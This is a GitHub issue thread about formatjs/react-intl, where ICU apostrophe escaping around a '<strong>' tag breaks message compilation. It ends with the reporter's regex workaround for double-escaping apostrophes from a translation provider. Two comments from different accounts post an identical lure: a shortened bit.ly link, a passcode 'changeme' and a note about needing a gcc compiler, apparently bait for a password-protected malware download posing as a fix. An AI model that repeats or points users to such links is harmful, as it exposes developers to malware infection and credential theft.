### ISSUE TITLE
Apostrophes around tag cause it to compile incorrectly

### ISSUE THREAD

**Issue by georeith** [formatjs/formatjs#4508]
## Which package?

- `react-intl` / `@formatjs/cli`

## Describe the bug

Given the following definition:

```json
{
  "WRPHD3": {
      "defaultMessage": "Seleccione '<strong>pantalla completa</strong>' cuando vea la ventana emergente y haga clic en 'Compartir'.",
      "description": "Instruct the user how to select the entire screen when screen sharing"
    }
}
```

I would expect it to compile into:

```json
{
  "WRPHD3": [
    {
      "type": 0,
      "value": "Seleccione '"
    },
    {
      "children": [
        {
          "type": 0,
          "value": "pantalla completa"
        }
      ],
      "type": 8,
      "value": "strong"
    },
    {
      "type": 0,
      "value": "' cuando vea la ventana emergente y haga clic en 'Compartir'."
    }
  ]
}
```

However it compiles into:

```json
{
  "WRPHD3": [
      {
        "type": 0,
        "value": "Seleccione '<strong>pantalla completa</strong>' cuando vea la ventana emergente y haga clic en 'Compartir'."
      }
  ],
}
```

Removing the apostrophes around `<strong>` makes it compile correctly.

### Codesandbox URL

[Reproduction
](https://codesandbox.io/p/sandbox/romantic-browser-8q6y7j?layout=%257B%2522sidebarPanel%2522%253A%2522EXPLORER%2522%252C%2522rootPanelGroup%2522%253A%257B%2522direction%2522%253A%2522horizontal%2522%252C%2522contentType%2522%253A%2522UNKNOWN%2522%252C%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522id%2522%253A%2522ROOT_LAYOUT%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522UNKNOWN%2522%252C%2522direction%2522%253A%2522vertical%2522%252C%2522id%2522%253A%2522cm0fhxsi000063b6ldbgy4gen%2522%252C%2522sizes%2522%253A%255B100%255D%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522EDITOR%2522%252C%2522direction%2522%253A%2522horizontal%2522%252C%2522id%2522%253A%2522EDITOR%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL%2522%252C%2522contentType%2522%253A%2522EDITOR%2522%252C%2522id%2522%253A%2522cm0fhxshz00023b6l77dv433u%2522%257D%255D%257D%252C%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522SHELLS%2522%252C%2522direction%2522%253A%2522horizontal%2522%252C%2522id%2522%253A%2522SHELLS%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL%2522%252C%2522contentType%2522%253A%2522SHELLS%2522%252C%2522id%2522%253A%2522cm0fhxshz00033b6lbif5hj6i%2522%257D%255D%257D%255D%257D%252C%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522DEVTOOLS%2522%252C%2522direction%2522%253A%2522vertical%2522%252C%2522id%2522%253A%2522DEVTOOLS%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL%2522%252C%2522contentType%2522%253A%2522DEVTOOLS%2522%252C%2522id%2522%253A%2522cm0fhxshz00053b6lld34cna0%2522%257D%255D%257D%255D%252C%2522sizes%2522%253A%255B50%252C50%255D%257D%252C%2522tabbedPanels%2522%253A%257B%2522cm0fhxshz00023b6l77dv433u%2522%253A%257B%2522tabs%2522%253A%255B%257B%2522id%2522%253A%2522cm0fhxshz00013b6ll5a4wzi9%2522%252C%2522mode%2522%253A%2522permanent%2522%252C%2522type%2522%253A%2522FILE%2522%252C%2522filepath%2522%253A%2522%252Fsrc%252Findex.tsx%2522%252C%2522state%2522%253A%2522IDLE%2522%252C%2522initialSelections%2522%253A%255B%257B%2522startLineNumber%2522%253A20%252C%2522startColumn%2522%253A1%252C%2522endLineNumber%2522%253A20%252C%2522endColumn%2522%253A1%257D%255D%257D%255D%252C%2522id%2522%253A%2522cm0fhxshz00023b6l77dv433u%2522%252C%2522activeTabId%2522%253A%2522cm0fhxshz00013b6ll5a4wzi9%2522%257D%252C%2522cm0fhxshz00053b6lld34cna0%2522%253A%257B%2522tabs%2522%253A%255B%257B%2522id%2522%253A%2522cm0fhxshz00043b6lnm648cdv%2522%252C%2522mode%2522%253A%2522permanent%2522%252C%2522type%2522%253A%2522UNASSIGNED_PORT%2522%252C%2522port%2522%253A0%257D%255D%252C%2522id%2522%253A%2522cm0fhxshz00053b6lld34cna0%2522%252C%2522activeTabId%2522%253A%2522cm0fhxshz00043b6lnm648cdv%2522%257D%252C%2522cm0fhxshz00033b6lbif5hj6i%2522%253A%257B%2522tabs%2522%253A%255B%255D%252C%2522id%2522%253A%2522cm0fhxshz00033b6lbif5hj6i%2522%257D%257D%252C%2522showDevtools%2522%253Atrue%252C%2522showShells%2522%253Afalse%252C%2522showSidebar%2522%253Atrue%252C%2522sidebarPanelSize%2522%253A15%257D)
### Reproducible Steps/Repo

See the `<strong>` is not replaced above when wrapped in apostrophes.

## Expected behavior

The `<strong>` should be replaced above.

## Screenshots

![image](https://github.com/user-attachments/assets/21314575-70d4-4f81-a4d3-6f043754f441)

## Desktop (please complete the following information):

- OS: MacOS
- Browser chrome
- Version 128

**Comment by maiarafag** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by georeith** [comment]
Urgh `'` is the escape character in ICU. If only my translations provider double escaped it :/

**Comment by longlho** [comment]
Only some provider supports ICU so it’s likely a provider issue.

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by georeith** [comment]
> Only some provider supports ICU so it’s likely a provider issue.

Yeah I am using Crowdin (using their `react-intl` default format). I've added a custom regex postprocessor that double escapes these:

regex: `(^|[^'])'([<{])`
replace: `$1''$2`

The original text for this was:

`"Select ‘<strong>entire screen</strong>’ when you see the popup and click ‘Share’"`

but the translation converted those into apostrophes. I'm potentially not handling the `&lquo;` and `&rquo;` properly but I didn't want to add them to my strings as I thought it would confuse the translation.
